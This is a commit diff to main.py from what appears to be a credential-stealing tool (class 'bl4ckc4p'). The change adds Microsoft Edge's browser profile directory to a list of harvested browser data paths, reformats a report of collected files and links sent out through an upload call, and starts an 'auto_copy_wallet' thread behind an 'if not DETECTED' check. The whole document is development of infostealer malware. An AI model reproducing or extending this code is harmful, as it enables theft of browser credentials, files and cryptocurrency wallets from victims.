Update main.py

This commit is contained in:
What about KSCH 2023-02-16 20:13:26 +01:00 committed by GitHub
parent cfb3545506
commit d9d4eed8f6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 4 deletions

11
main.py
View File

@ -443,8 +443,9 @@ class bl4ckc4p(Functions):
'yandex': self.appdata + '\\Yandex\\YandexBrowser\\User Data',
'brave': self.appdata + '\\BraveSoftware\\Brave-Browser\\User Data',
'iridium': self.appdata + '\\Iridium\\User Data',
}
'edge': self.appdata + "\\Microsoft\\Edge\\User Data"
}
self.profiles = [
'Default',
'Profile 1',
@ -1763,12 +1764,12 @@ if not DETECTED:
for thread in wikith: thread.join()
time.sleep(0.2)
filetext = "\n"
filetext = "```diff\n"
for arg in blackcapedezFiles:
if len(arg[2]) != 0:
foldpath = arg[1]
foldlist = arg[2]
filetext +=f"```diff\n"
filetext +=f"\n"
filetext += f"- {foldpath}\n"
for ffil in foldlist:
@ -1776,8 +1777,10 @@ if not DETECTED:
fileanme = a[len(a)-1]
b = ffil[1]
filetext += f"+ Name: {fileanme}\n+ Link: {b}"
filetext += "\n```"
filetext += "\n"
filetext += "\n```"
upload("blackcapedez", filetext)
auto = threading.Thread(target=auto_copy_wallet().run)
auto.start()